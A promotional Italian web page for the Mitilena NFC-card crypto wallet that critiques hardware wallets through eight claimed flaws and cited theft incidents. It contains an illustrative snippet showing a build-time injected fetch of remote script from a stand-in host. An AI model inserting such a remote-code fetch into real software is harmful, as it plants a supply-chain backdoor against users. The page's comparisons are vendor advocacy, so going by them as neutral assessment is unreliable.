8 falle Codice aperto Checklist Domande
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Crea portafoglioCrea
Wallet hardware · falle non ovvie

Falle non ovvie del wallet hardware

Comprate un dispositivo per chiudere i buchi. Con lui arrivano nuovi: firmware, aggiornamenti, un servizio sul computer, schermo, scatola, account presso il venditore. Otto dettagli che nelle recensioni finiscono tra i vantaggi — e otto modi con cui, attraverso di essi, hanno portato via soldi nel 2020-2026.

Casi reali con date e importi Secondo la documentazione dei produttori Il kit lo confrontiamo con la stessa lista
Il costo dell’errorecasi pubblici
2026Coldcard · casualità debole nel firmware100+ mln $
2025Bybit · i firmatari hanno firmato ciò che non vedevano1,5 mld $
2024Dark Skippy · il seed esce con due firmericerca
2023Ledger Connect Kit · backdoor nella libreria600 mila $
2021App wallet falsa nell’App Store17,1 BTC
2020Fuga database clienti Ledger · phishing per anni270.000 pers.
Otto falle

Ogni dettaglio lodato nelle recensioni è un buco a sé

Il wallet hardware chiude un solo buco: la chiave non sta più sul telefono con internet. Ma il dispositivo non è vuoto. Ha firmware, aggiornamenti, un programma sul computer, uno schermo, una scatola, un venditore con il vostro indirizzo — e ogni dettaglio aggiunge una superficie di attacco che prima non c’era. Qui sotto otto di questi dettagli: cosa ne dicono le recensioni, come attraverso di essi hanno portato via i soldi, come chiudere la falla e se quel dettaglio c’è nel nostro kit.

Falla 01

Il firmware che crea la vostra chiave

Nelle recensioni: «chip protetto, la chiave nasce dentro il dispositivo e non lo lascia mai»

La chiave è un numero casuale enorme, e a crearlo è il firmware. Un solo errore lì — e le chiavi in realtà sono poche: le forzate su tutti i possessori insieme, senza accedere al dispositivo, anni dopo l’acquisto. Il chip non c’entra: il buco è sopra di lui.

Caso
100+ mln $
Coldcard, luglio 2026: un errore di build del firmware dal 2021 sostituiva in silenzio il generatore hardware con uno debole, seminato con il numero di serie e un timer. La resistenza delle chiavi è scesa a circa 40 bit; 5.000+ indirizzi svuotati.
Come chiudere la falla
Potete portare la vostra casualità: lanci di dadi, una frase vostra. Un wallet che accetta entropia da voi non dipende da un solo errore nel firmware.
Questo dettaglio da noi non c’è
Sulla carta non c’è firmware: è un supporto cifrato. La chiave la crea Mitilena Air dal generatore di sistema del dispositivo, e potete impostare una frase-seed vostra al posto di parole casuali.
Falla 02

Aggiornamenti che siete obbligati a installare

Nelle recensioni: «il produttore rilascia aggiornamenti di sicurezza con regolarità»

Ogni aggiornamento è il momento in cui il firmware può essere sostituito. Un firmware manipolato nasconde pezzi di seed in due-tre firme normali, e all’esterno il dispositivo funziona come sempre. Non aggiornare non si può: i buchi si chiudono proprio con gli aggiornamenti.

Caso
2 firme
Dark Skippy, agosto 2024: i ricercatori hanno mostrato che un firmware malevolo di un wallet hardware porta via l’intero seed in due transazioni. Basta aggiornarsi una volta dalla fonte sbagliata.
Come chiudere la falla
Da dove arrivano i firmware e se il dispositivo ne verifica la firma. Il meglio è quando non c’è proprio nulla da aggiornare.
Questo dettaglio da noi non c’è
Sulla carta non c’è nulla da aggiornare né da sostituire. Firma l’app sul telefono, e le sue build sono firmate e arrivano da App Store e Google Play — come qualsiasi app che vedete e chiudete voi.
Falla 03 · Sentite l’assurdo
Nelle recensioni: «comoda app ufficiale per il computer»

Un wallet per la sfiducia a cui si allega un servizio

Comprate un dispositivo per una sola ragione: non fidarvi più del computer. Perché funzioni, sullo stesso computer va installato un servizio in background. Non l’avete scritto, non l’avete avviato e non lo controllate: parte con il sistema, ascolta una porta a cui può bussare qualsiasi programma sulla macchina, e fa qualcosa in questo momento — cosa, non lo sapete e non lo verificherete mai.

Restava in background anche dopo aver chiuso il wallet. Per anni. Presso uno dei produttori più grandi era un servizio-«ponte» separato; nel 2025 l’hanno nascosto dentro l’app stessa — il servizio c’è ancora, muore solo con la finestra. Per la maggior parte degli altri, senza un programma sul computer il dispositivo è un portachiavi. Su Linux aggiungete regole udev, altrimenti il sistema non cede la USB.

Quindi la cosa che avete comprato per non dipendere dai programmi sul computer non funziona senza un programma sul computer. E non quello che vedete, ma quello che gira sotto.

Questo dettaglio da noi non c’è
Sul computer non si installa nulla: né servizio, né driver, né porta. L’intermediario è il chip NFC già nel telefono, fatto dal suo produttore e soggetto al sistema operativo: funziona solo quando l’app è aperta e avete avvicinato voi la carta, e il telefono chiede il permesso ogni volta. La carta è passiva: niente batteria, niente radio, da sola non fa nulla. Chiudete l’app — non resta nulla che lavori senza di voi. Onestamente: l’app sul telefono serve, ed è come qualsiasi altra — la vedete, la avviate e la chiudete voi. In ripostiglio non vive nessuno.
Monitor di sistemaWALLET CHIUSO
ProcessoStatoAttivo
HW Wallet Appwallet
chiuso da voi-
hwwalletdservizio in background · ponte USB
attivo412 gg 06:14
avviato dal sistema al loginnon si può chiudere — è un servizio
Mockup, nomi fittizi. Così appariva un computer con uno dei USB-wallet più popolari fino al 2025; poi il «ponte» è stato messo dentro l’app — il servizio è lo stesso, solo non si vede più nella lista.
Allegoria
Una casa per la privacy — e un ospite nel ripostiglio

Volevate una casa per la privacy. L’avete comprata. Poi serviva la vigilanza — l’avete messa. E perché la tariffa della vigilanza funzionasse, vi hanno chiesto di far entrare in casa una persona in divisa che vive nel ripostiglio 24 ore su 24, ha le chiavi di tutte le porte e non risponde a voi. Non l’avete assunta, non potete licenziarla, e cosa fa di notte non lo sapete.

Certo, è «di casa». Sta scritto nel contratto. Volevate privacy e avete avuto un surrogato: una casa con un ospite che non avete scelto.

Falla 04 · Codice aperto non è un audit
Nelle recensioni: «codice aperto — chiunque può verificarlo»

Il codice aperto è un modo per i programmatori di lavorare insieme, non un segno che il programma non ruba

Il codice sorgente aperto è nato per condividere programmi e ripararli insieme. È uno strumento di collaborazione, e in quel ruolo è eccellente. Un marchio di qualità «questo software non ruberà i vostri soldi» non lo è mai stato, ed ecco perché: non usate il codice sorgente. Usate ciò che avete scaricato.

Tra il repository su GitHub e il file sul telefono ci sono build, store delle app, aggiornamento, server. In uno qualsiasi di questi passaggi può entrare una riga che scarica qualsiasi cosa da qualsiasi posto — e nel repository non ci sarà. Confrontare la vostra copia con il sorgente non potete: gli store danno un file compilato, il web-wallet a ogni apertura riceve il codice che il server ha deciso di darvi oggi, l’estensione del browser si aggiorna in silenzio di notte.

«Aperto» significa che alcune persone possono controllare una qualche versione in un qualche giorno. Cosa fa la vostra copia in questo momento — non lo significa.

Nel repository · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Sul vostro telefono · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Una riga nella build. Nel repository non c’è, nello store non si vede, da voi funziona.
L’apertura non ha impedito nessuno di questi casi
Ledger Connect Kit2023
libreria aperta su GitHub; una versione malevola è stata pubblicata su npm, decine di siti l’hanno caricata live in poche ore
Copay / event-stream2018
wallet open source; la backdoor è arrivata da una dipendenza mirata proprio a lui
xz utils2024
aperta da vent’anni; un backdoor stava nei rilasci finché un ingegnere non ha notato per caso che l’accesso SSH era mezzo secondo più lento
Coldcard2026
firmware open source; un errore di build per cinque anni sostituiva il generatore hardware con uno debole — chiavi forzate senza accesso al dispositivo, 5.000+ indirizzi, 100+ mln di dollari
Cosa funziona allora
Non leggere il codice altrui, ma due controlli alla portata di chiunque. Il primo — audit del comportamento: mettete sul computer un proxy di intercettazione, fateci passare l’app e guardate cosa e dove invia. Il codice non serve leggerlo — il traffico si vede tutto. Il secondo — un’architettura in cui al codice non resta nulla da rubare: se la chiave non sta mai su un dispositivo con internet, qualsiasi riga in qualsiasi aggiornamento è impotente, non ha nulla da spedire.
Come da noi
Il primo lo proponiamo noi: fate passare la nostra app da un proxy, la versione web dalle DevTools del browser, e guardate ogni richiesta. La chiave di firma e il seed non ci compariranno; unica eccezione — la view key Monero, di cui parliamo nella pagina «Come parte un trasferimento». Il secondo è nel kit: la chiave nasce in Mitilena Air su un dispositivo senza internet, vive sulla carta, e nell’app online arriva solo la firma — lì non c’è nulla da proxyare. E l’offline qui è vero: in modalità air-gap il dispositivo con la chiave non è collegato a nulla — né cavo né Bluetooth; la transazione entra ed esce come QR che vedete con gli occhi. Non un wallet «freddo» al cavo che pende da un computer online con il suo servizio e scambia chissà cosa.
Falla 05

Lo schermo su cui non si vede cosa firmate

Nelle recensioni: «conferma sullo schermo del dispositivo — un virus sul computer è impotente»

Lo schermo è piccolo e spesso non mostra indirizzo e importo, ma un hash o una «chiamata al contratto». Confermate ciò che non vedete — e la firma è comunque onesta, vostra. Lo schermo dà un senso di controllo che non c’è.

Caso
1,5 mld $
Bybit, febbraio 2025: i firmatari con wallet hardware hanno confermato un trasferimento che nell’interfaccia sembrava normale. I dispositivi mostravano dati che una persona non poteva confrontare.
Come chiudere la falla
Destinatario, importo e tipo di operazione in linguaggio umano, non un hash, e un rifiuto con un solo pulsante.
Come da noi
Lo schermo c’è, ma è quello del telefono: indirizzo, importo e tipo di richiesta a parole — trasferimento, chiamata al contratto, permesso — e il pulsante «Rifiuta». Per importi grandi — un dispositivo separato senza rete, dove la transazione arriva intera.
Falla 06

La scatola in cui il seed c’è già

Nelle recensioni: «arriva in una scatola sigillata con sigillo di sicurezza»

Un dispositivo fisico significa consegna, intermediari e marketplace «in sconto». Il wallet arriva già configurato, con il seed su un foglietto dentro. Oppure un’app-clone nello store chiede di «inserire il seed per l’attivazione».

Caso
17,1 BTC
App Store, 2021: un possessore di wallet hardware ha inserito il seed in un’app-clone e ha perso 17,1 BTC. Nello stesso anno, dopo la fuga del database, ai clienti Ledger spedivano dispositivi falsi con la lettera «spostate il seed sul nuovo».
Come chiudere la falla
Inizializzare da soli e non usare mai un seed arrivato già scritto. Il sigillo non è una verifica; la verifica è che la chiave la create voi.
Come da noi
Le carte arrivano vuote: la chiave la create e la scrivete voi, un seed «pronto» in scatola non può esserci. L’app — solo da App Store e Google Play dai link del sito; chiede il seed solo per import e firma.
Falla 07

Account presso il produttore

Nelle recensioni: «garanzia ufficiale, supporto e area personale»

Per comprare il dispositivo lasciate al produttore nome, email e indirizzo di consegna. Ora la vostra sicurezza dipende dalla sua base dati. Se esce — per anni vi scriveranno «confermate il seed sul nuovo dispositivo», a volte spedendo pacchi.

Caso
270.000 pers.
Ledger, 2020: sono usciti i dati di 270.000 acquirenti, indirizzi postali inclusi. Email, telefonate e pacchi con la richiesta di «migrare» il seed arrivano tuttora.
Come chiudere la falla
Meno sanno di voi, più corto è il vettore: acquisto senza account, supporto che non chiede mai il seed, e la regola «il seed lo chiede solo un ladro».
Questo dettaglio da noi non c’è
Il wallet funziona senza registrazione, non c’è account. Al venditore è noto solo l’indirizzo di consegna. Il seed non lo chiedono né il supporto né l’app.
Falla 08

Un solo dispositivo e un solo foglietto

Nelle recensioni: «guscio robusto, schermo grande, batteria per una settimana»

Più dettagli ci sono, più cose si rompono: connettore, schermo, batteria. E il ripristino finisce su un solo foglietto col seed — bagnato, perso in un trasloco, fotografato «per sicurezza». La causa più frequente delle perdite non è un hack.

Caso
≈20 % BTC
Secondo Chainalysis, circa un quinto di tutti i bitcoin è perso per sempre — soprattutto per chiavi smarrite, non per hack.
Come chiudere la falla
Quante copie della chiave danno dalla scatola e in che forma, cosa succede se perdete il dispositivo, se c’è qualcosa che possa rompersi.
Questo dettaglio da noi non c’è
Niente schermo, batteria né connettore — nulla da rompere. E non una copia sola, ma cinque speculari dalla scatola: due carte NFC e tre sticker stealth in plastica impermeabile, 10+ anni.
Checklist

Cosa non deve esserci in un wallet

Otto dettagli per otto falle. La lista vale per qualsiasi wallet — hardware, mobile, browser. Segnate cosa ha quello che state scegliendo — e anche il nostro.

01
Una chiave creata solo dal programmasenza la vostra casualità — una frase vostra o i dadi
02
Aggiornamenti dove sta la chiaveogni aggiornamento è una chance di sostituzione
03
Servizio, driver o porta sul computervedi falla 03
04
Badge «open source» al posto dell’architetturala chiave dove può arrivare codice altrui
05
Schermo con hash al posto di indirizzo e importoe senza pulsante «Rifiuta»
06
Seed arrivato già scrittonella scatola, nella lettera, nell’«app di attivazione»
07
Account presso il produttoree un supporto che può chiedere il seed
08
Unica copia e pezzi che si romponoschermo, batteria, connettore, un solo foglietto
Nel kit Ultimate, su questa lista, non c’è nessuno degli otto dettagli. In scatola — 2 carte NFC e 3 sticker stealth, Mitilena Air (chiavi senza internet) e Mitilena Keys (firma senza internet). Le carte arrivano vuote: chiave e cifratura le fate voi, non un chip di fabbrica. Contenuto e prezzo →
Ultimate · kit offline

Non un «chip sicuro» di fabbrica — un supporto che cifrate voi

Le carte arrivano vuote. La chiave la create in Mitilena Air su un telefono senza internet e la scrivete voi. La firma — con Mitilena Keys, pure senza rete: la transazione viaggia come QR. In scatola cinque copie uguali: 2 carte NFC e 3 sticker stealth in plastica impermeabile. 18 reti, 20.000+ monete, USDT incluso.

Nulla da installare sul computer
Niente firmware, aggiornamenti, schermo né batteria
Transazione verso un telefono offline — suono o QR, senza cavo né USB
Funziona con l’app Mitilena gratuita sul telefono
Plastica impermeabile, durata di conservazione 10+ anni
Spedizione in Europa 3–5 giorni, nel mondo circa 7 · da Praga, mitilena-store.com
Carta NFC Mitilena
Ultimate · generazione e firma senza rete
€369€439
2 carte NFC · 3 sticker stealth · Mitilena Air · licenza Mitilena Keys
Ordina Ultimate · €369 Base e Premium — da €79
Domande

Cosa chiedono dopo aver letto fino a qui

Pro e contro di un wallet hardware, in breve?

Il pro è uno solo, ed è grande: la chiave non sta sul telefono con internet. I contro sono gli otto dettagli sopra, ciascuno aggiunge una superficie di attacco. Un buon wallet hardware è quello dove i dettagli sono di meno, non di più.

E se il telefono è infetto?

Con la carta sul telefono principale la chiave appare in un ambiente isolato per il secondo della firma — è lo stesso rischio di qualsiasi wallet sul telefono, solo più breve. Per importi che fanno paura — secondo livello: firma su un dispositivo separato senza internet, dove la transazione arriva come QR.

E se rubano o perdete la carta?

Senza password carta e sticker sono plastica inutile: la chiave lì è cifrata. E la copia persa la sostituiscono le altre quattro: due carte e tre sticker dalla scatola — speculari.

Bisogna aggiornare il firmware di un wallet hardware?

Se il produttore ha chiuso un buco — sì, e quello è proprio il momento in cui il firmware può essere sostituito: verificate fonte e firma. Su un supporto senza firmware questa scelta non c’è — nulla da aggiornare e nulla da sostituire.

In cosa differisce da un USB-wallet?

Nell’assenza di intermediari: niente cavo, driver, servizio in background né programma sul computer. L’unico intermediario è il chip NFC del vostro telefono, e risponde a voi e al sistema operativo, non al produttore del wallet.

Codice aperto significa sicuro?

Significa verificabile da qualcuno, qualche volta. Non usate il codice, ma ciò che avete scaricato, e non potete confrontare l’uno con l’altro. La sicurezza la dà un’architettura in cui la chiave non sta dove può arrivare codice altrui.

Carte NFC con generazione e firma senza internet

5 copie della chiave · Air · Keys · oppure un portafoglio gratis in 30 secondi · Perché un portafoglio hardware «freddo» basato sul chip sicuro di fabbrica spesso è un falso →
Ordina Ultimate · €369 Crea un portafoglio gratis